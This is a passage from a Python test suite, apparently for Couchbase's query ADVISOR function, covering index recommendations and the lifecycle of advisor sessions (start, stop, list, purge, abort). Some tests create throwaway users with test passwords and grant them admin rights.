self.log.info("============== QueryAdvisorTests suite_tearDown has completed ==============")
super(QueryAdvisorTests, self).suite_tearDown()
def wait_for_index_online(self, bucket, index, scope='default', collection='default'):
        if scope == 'default' and collection == 'default':
query_index = f"SELECT state FROM system:indexes where keyspace_id = '{bucket}' and name = '{index}'"
else:
query_index = f"SELECT state FROM system:indexes where bucket_id = '{bucket}' and scope_id = '{scope}' and keyspace_id = '{collection}' and name = '{index}'"
init_time = time.time()
while True:
next_time = time.time()
query_response = self.run_cbq_query(query=query_index)
self.log.info(f"{index} state: {query_response['results'][0]['state']}")
if query_response['results'][0]['state'] == 'online':
break
if next_time - init_time > 600:
break
time.sleep(2)
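    # Helper for the tests below: ADVISOR(...) results carry a 'recommended_indexes' list whose
    # entries hold the CREATE INDEX statement under 'index' and the contributing queries (with
    # their 'run_count') under 'statements'; collect both for the callers.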
def get_statements(self, advisor_results):
indexes = []
statements = []
for index in advisor_results['results'][0]['$1']['recommended_indexes']:
indexes.append(index['index'])
statements.append(index['statements'])
return indexes, statements
def purge_all_sessions(self):
try:
self.log.info("Purging all previous sessions")
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
for task in results['results'][0]['List']:
session = task['tasks_cache']['name']
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action':'purge', 'session':'{0}'}}) as Purge".format(session), server=self.master)
except Exception as e:
self.log.error("List/Purge sessions failed: {0}".format(e))
self.fail()
# Advisor on update statement
def test_query_string(self):
try:
advise = self.run_cbq_query(query="SELECT ADVISOR(\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'\")".format(self.bucket_name), server=self.master)
simple_indexes, statements = self.get_statements(advise)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
for index in simple_indexes:
self.run_cbq_query(query=index)
self.wait_for_all_indexes_online()
try:
results_with_advise_index = self.run_cbq_query(query="UPDATE `{0}` SET city = 'SF' WHERE lower(city) = 'san francisco'".format(self.bucket_name), server=self.master)
self.assertEqual(results_with_advise_index['status'], 'success')
self.assertEqual(results_with_advise_index['metrics']['mutationCount'], 938)
finally:
index_name = index.split("INDEX")[1].split("ON")[0].strip()
self.run_cbq_query("DROP INDEX `{0}`.{1}".format(self.bucket_name,index_name))
# same query: query count should be > 1
def test_same_query_array(self):
try:
results_simple = self.run_cbq_query(query="SELECT ADVISOR([ \
\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'\", \
\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'\" \
])".format(self.bucket_name), server=self.master)
simple_indexes, statements = self.get_statements(results_simple)
self.assertEqual(statements[0][0]['run_count'], 2)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
# similar query: statement count should be > 1
def test_similar_query_array(self):
try:
results_simple = self.run_cbq_query(query="SELECT ADVISOR([ \
\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'\", \
\"UPDATE `{0}` SET city = 'San Francisco' WHERE lower(city) = 'saintfrancois'\" \
])".format(self.bucket_name), server=self.master)
simple_indexes, statements = self.get_statements(results_simple)
self.assertEqual(len(statements[0]), 2)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
def test_diff_query_array(self):
query1 = f"UPDATE `{self.bucket_name}` SET city = 'San Francisco' WHERE lower(city) = 'sanfrancisco'"
query2 = f"SELECT name, city FROM `{self.bucket_name}` WHERE type = 'hotel' AND country = 'France'"
query3 = f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'lyon'"
try:
advise = self.run_cbq_query(query=f"SELECT ADVISOR([\"{query1}\", \"{query2}\", \"{query3}\"])", server=self.master)
self.assertEqual(len(advise['results'][0]['$1']['recommended_indexes']), 3)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
def test_query_output_array(self):
# Run some queries
query_paris = "SELECT airportname FROM `{0}` WHERE type = 'airport' and lower(city) = 'paris' AND country = 'France'".format(self.bucket_name)
query_lyon = "SELECT airportname FROM `{0}` WHERE type ='airport' and lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name)
query_grenoble = "SELECT airportname FROM `{0}` WHERE type = 'airport' and lower(city) = 'grenoble' AND country = 'France'".format(self.bucket_name)
results = self.run_cbq_query(query=query_paris, server=self.master)
results = self.run_cbq_query(query=query_paris, server=self.master)
results = self.run_cbq_query(query=query_paris, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
try:
results = self.run_cbq_query(query="select ADVISOR((SELECT RAW statement FROM system:completed_requests order by requestTime DESC limit 6)) as `Advise`".format(self.bucket_name), server=self.master)
advises = results['results'][0]['Advise']
query_count = dict()
for index in advises['recommended_indexes']:
for query in index['statements']:
query_count[query['statement']] = query['run_count']
self.assertEqual(query_count[query_paris], 3)
self.assertEqual(query_count[query_lyon], 2)
self.assertEqual(query_count[query_grenoble], 1)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
def test_query_array_arg_large(self,num=10):
query_paris = "SELECT airportname FROM `{0}` WHERE type = 'airport' and lower(city) = 'paris' AND country = 'France'".format(self.bucket_name)
query_array = [query_paris] * num
try:
results = self.run_cbq_query(query="select ADVISOR({0}) as `Advise`".format(query_array), server=self.master)
advises = results['results'][0]['Advise']
self.assertEqual(advises['recommended_indexes'][0]['statements'][0]['run_count'], num)
self.assertEqual(advises['recommended_indexes'][0]['statements'][0]['statement'], query_paris)
except Exception as e:
self.log.error("Advisor statement failed: {0}".format(e))
self.fail()
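    # Session-based advisor workflow used by the tests below: ADVISOR({'action':'start', ...})
    # returns a session name; 'stop' ends collection, 'get' fetches the recommendations,
    # 'list' exposes the tasks_cache entries, and 'purge'/'abort' remove the session.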
# get session recommendation for completed session
def test_get_session_completed(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '10s', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Wait for session to complete
self.sleep(10)
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'get', 'session': '{0}'}})".format(session), server=self.master)
self.assertTrue('recommended_indexes' in results['results'][0]['$1'][0][0], "There are no recommended index: {0}".format(results['results'][0]['$1'][0][0]))
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_get_session_stopped(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
self.sleep(3)
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(session), server=self.master)
# Stop a second time to ensure no side effect (see MB-48576)
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'get', 'session': '{0}'}})".format(session), server=self.master)
self.assertTrue('recommended_indexes' in results['results'][0]['$1'][0][0], "There are no recommended index: {0}".format(results['results'][0]['$1'][0][0]))
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_stop_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1234567ms', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
task = results['results'][0]['List'][0]['tasks_cache']
self.log.info("Task cache is {0}".format(task))
self.assertEqual(list(task.keys()), ['class', 'delay', 'id', 'name', 'node', 'results', 'state', 'subClass', 'submitTime'])
self.assertEqual(task['state'], "cancelled")
self.assertEqual(task['delay'], "20m34.567s")
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_abort_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '3600s', 'query_count': 200 })", server=self.master)
session = results['results'][0]['$1']['session']
# Check session is active
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'active'}) as List", server=self.master)
task = results['results'][0]['List'][0]['tasks_cache']
self.log.info("Task cache is {0}".format(task))
self.assertEqual(task['state'], "scheduled")
self.assertEqual(task['delay'], "1h0m0s")
self.assertEqual(task['name'], session)
# Abort session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'abort', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_purge_session_completed(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '5000ms', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Wait for session to complete
self.sleep(5)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
task = results['results'][0]['List'][0]['tasks_cache']
self.assertEqual(task['state'], "completed")
# Purge session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'purge', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_purge_session_stopped(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '5000s', 'query_count': 2 })", server=self.master)
session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
task = results['results'][0]['List'][0]['tasks_cache']
self.assertEqual(task['state'], "cancelled")
# Purge session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'purge', 'session': '{0}'}})".format(session), server=self.master)
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(results['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_purge_session_active(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '3600s', 'query_count': 200 })", server=self.master)
session = results['results'][0]['$1']['session']
# Check session is active
list_all = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'active'}) as List", server=self.master)
task = list_all['results'][0]['List'][0]['tasks_cache']
self.log.info("Task cache is {0}".format(task))
self.assertEqual(task['state'], "scheduled")
self.assertEqual(task['delay'], "1h0m0s")
self.assertEqual(task['name'], session)
# Purge session
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'purge', 'session': '{0}'}})".format(session), server=self.master)
list_all = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(list_all['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_list_session(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '99h', 'query_count': 2 })", server=self.master)
active_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '50ms', 'query_count': 2 })", server=self.master)
completed_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1600m', 'query_count': 2 })", server=self.master)
stopped_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(stopped_session), server=self.master)
# List sessions
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
all_sessions = dict()
for task in results['results'][0]['List']:
all_sessions[task['tasks_cache']['state']] = task['tasks_cache']['name']
self.assertEqual(len(all_sessions), 3)
self.assertEqual(all_sessions['scheduled'], active_session)
self.assertEqual(all_sessions['cancelled'], stopped_session)
self.assertEqual(all_sessions['completed'], completed_session)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_list_session_active(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '99h', 'query_count': 2 })", server=self.master)
active_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '50ms', 'query_count': 2 })", server=self.master)
completed_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1600m', 'query_count': 2 })", server=self.master)
stopped_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(stopped_session), server=self.master)
# List ACTIVE sessions
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'active'}) as List", server=self.master)
all_sessions = dict()
for task in results['results'][0]['List']:
all_sessions[task['tasks_cache']['state']] = task['tasks_cache']['name']
self.assertEqual(len(all_sessions), 1)
self.assertEqual(all_sessions['scheduled'], active_session)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_list_session_completed(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '99h', 'query_count': 2 })", server=self.master)
active_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '50ms', 'query_count': 2 })", server=self.master)
completed_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1600m', 'query_count': 2 })", server=self.master)
stopped_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(stopped_session), server=self.master)
# List COMPLETED sessions
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'completed'}) as List", server=self.master)
all_sessions = dict()
for task in results['results'][0]['List']:
all_sessions[task['tasks_cache']['state']] = task['tasks_cache']['name']
self.assertEqual(len(all_sessions), 1)
self.assertEqual(all_sessions['completed'], completed_session)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_list_session_all(self):
try:
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '99h', 'query_count': 2 })", server=self.master)
active_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '50ms', 'query_count': 2 })", server=self.master)
completed_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1600m', 'query_count': 2 })", server=self.master)
stopped_session = results['results'][0]['$1']['session']
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
results = self.run_cbq_query(query="SELECT airportname FROM `{0}` WHERE lower(city) = 'lyon' AND country = 'France'".format(self.bucket_name), server=self.master)
# Stop session
results = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'stop', 'session': '{0}'}})".format(stopped_session), server=self.master)
# List ALL sessions
results = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status':'all'}) as List", server=self.master)
all_sessions = dict()
for task in results['results'][0]['List']:
all_sessions[task['tasks_cache']['state']] = task['tasks_cache']['name']
self.assertEqual(len(all_sessions), 3)
self.assertEqual(all_sessions['scheduled'], active_session)
self.assertEqual(all_sessions['cancelled'], stopped_session)
self.assertEqual(all_sessions['completed'], completed_session)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_start_session_duration_value(self):
durations = ['3600000000000ns','3600000000us','3600000ms','3600s','60m', '1h']
try:
for duration in durations:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '{0}'}})".format(duration), server=self.master)
session = start['results'][0]['$1']['session']
active = self.run_cbq_query(query="SELECT ADVISOR({'action':'list'}) as List", server=self.master)
delay = active['results'][0]['List'][0]['tasks_cache']['delay']
self.assertEqual(delay, '1h0m0s')
abort = self.run_cbq_query(query="SELECT ADVISOR({{'action':'abort', 'session':'{0}'}}) as Abort".format(session), server=self.master)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_duration_completed(self):
durations = ['1800000000ns','1800000us','1800ms','1.8s','0.03m', '0.0005h']
try:
for duration in durations:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '{0}'}})".format(duration), server=self.master)
session = start['results'][0]['$1']['session']
self.sleep(3)
complete = self.run_cbq_query(query="SELECT ADVISOR({'action':'list','status':'completed'}) as List", server=self.master)
name = complete['results'][0]['List'][0]['tasks_cache']['name']
delay = complete['results'][0]['List'][0]['tasks_cache']['delay']
state = complete['results'][0]['List'][0]['tasks_cache']['state']
self.assertEqual(delay, '1.8s')
self.assertEqual(name, session)
self.assertEqual(state, "completed")
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action':'purge', 'session':'{0}'}}) as Purge".format(session), server=self.master)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_response_below(self):
responses = ['100000000ns','100000us','100ms','0.1s', '0.000027h']
query1=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'lyon' AND country = 'France'"
query2=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'grenoble' AND country = 'France'"
query3=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'nice' AND country = 'France'"
try:
for response in responses:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '60s', 'response': '{0}'}})".format(response), server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
results = self.run_cbq_query(query=query2, server=self.master)
results = self.run_cbq_query(query=query3, server=self.master)
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
run_count = get['results'][0]['Get'][0][0]['recommended_indexes'][0]['statements'][0]['run_count']
self.assertEqual(run_count, 1)
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action':'purge', 'session':'{0}'}}) as Purge".format(session), server=self.master)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_response_above(self):
responses = ['9000000000000ns','9000000000us','9000000ms','9000s', '0.25h']
query1=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'lyon' AND country = 'France'"
query2=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'grenoble' AND country = 'France'"
query3=f"SELECT airportname FROM `{self.bucket_name}` WHERE type = 'airport' AND lower(city) = 'nice' AND country = 'France'"
try:
for response in responses:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '60s', 'response': '{0}'}})".format(response), server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
results = self.run_cbq_query(query=query2, server=self.master)
results = self.run_cbq_query(query=query3, server=self.master)
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
advise = get['results'][0]['Get'][0]
self.assertEqual(advise, [[]])
purge = self.run_cbq_query(query="SELECT ADVISOR({{'action':'purge', 'session':'{0}'}}) as Purge".format(session), server=self.master)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_profile(self):
self.users = [{"id": "johnDoe", "name": "Jonathan Downing", "password": "password1"}]
self.create_users()
grant = self.run_cbq_query(query="GRANT {0} to {1}".format("admin", self.users[0]['id']),server=self.master)
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
query2=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "grenoble" AND country = "France"'
query3=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "nice" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action': 'start', 'duration': '180s', 'profile': '{0}'}})".format(self.users[0]['id']), server=self.master)
session = start['results'][0]['$1']['session']
# Run query as other user
# results = self.curl_with_roles(query1)
# results = self.curl_with_roles(query1)
results = self.run_cbq_query(query=query1, username=self.users[0]['id'], password=self.users[0]['password'], server=self.master)
results = self.run_cbq_query(query=query1, username=self.users[0]['id'], password=self.users[0]['password'], server=self.master)
# run query as current user
results = self.run_cbq_query(query=query2, server=self.master)
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_all(self):
self.users = [{"id": "joaoDoe", "name": "Joao Downing", "password": "password1"}]
self.create_users()
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant = self.run_cbq_query(query=f"GRANT admin to {user_id}",server=self.master)
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
query2=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "grenoble" AND country = "France"'
query3=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "nice" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({{'action':'start', 'duration':'40m', 'profile': '{0}', 'query_count':5, 'response':'50ms'}})".format(self.users[0]['id']), server=self.master)
session = start['results'][0]['$1']['session']
# Run query as other user
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
# Run query as current user
results = self.run_cbq_query(query=query2, server=self.master)
# Run query as other user
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
results = self.run_cbq_query(query=query1, username=user_id, password=user_pwd, server=self.master)
# Stop and get session
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
self.assertEqual(statement['run_count'], 5)
# Purge and list session
purge = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'purge', 'session':'{session}'}}) as Get", server=self.master)
list_all = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", server=self.master)
self.assertEqual(list_all['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_cbo(self):
advise_index = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
advise_stats = "UPDATE STATISTICS FOR `travel-sample`(lower(`city`), `country`, `type`)"
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
# update stats to ensure CBO is used
stats = self.run_cbq_query(query=f"update statistics for `{self.bucket_name}`(type)", server=self.master)
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
results = self.run_cbq_query(query=query1, server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertEqual(index['index'], advise_index)
self.assertEqual(index['update_statistics'], advise_stats)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_query_txn(self):
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
close_txn = ['ROLLBACK WORK', 'COMMIT']
try:
for rollback_or_commit in close_txn:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in transaction
results = self.run_cbq_query(query="BEGIN WORK", server=self.master)
txid = results['results'][0]['txid']
results = self.run_cbq_query(query=query1, txnid=txid, server=self.master)
results = self.run_cbq_query(query=rollback_or_commit, txnid=txid, server=self.master)
# Stop and check session advise
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_negative_txn(self):
results = self.run_cbq_query(query="BEGIN WORK", server=self.master)
txid = results['results'][0]['txid']
error = "advisor function is not supported within the transaction"
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m'})", txnid=txid, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_session_query_count(self):
query_lyon=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
query_grenoble=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "grenoble" AND country = "France"'
query_nice=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "nice" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '15m', 'query_count': 6})", server=self.master)
session = start['results'][0]['$1']['session']
# Run 9 queries
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_lyon, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
results = self.run_cbq_query(query=query_grenoble, server=self.master)
results = self.run_cbq_query(query=query_nice, server=self.master)
# Stop and check session advise. We should only see 6 queries count = 3*lyon + 2*grenoble + 1*nice
stop = self.run_cbq_query(query="SELECT ADVISOR({{'action':'stop', 'session':'{0}'}}) as Stop".format(session), server=self.master)
get = self.run_cbq_query(query="SELECT ADVISOR({{'action':'get', 'session':'{0}'}}) as Get".format(session), server=self.master)
queries_count = dict()
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for query in index['statements']:
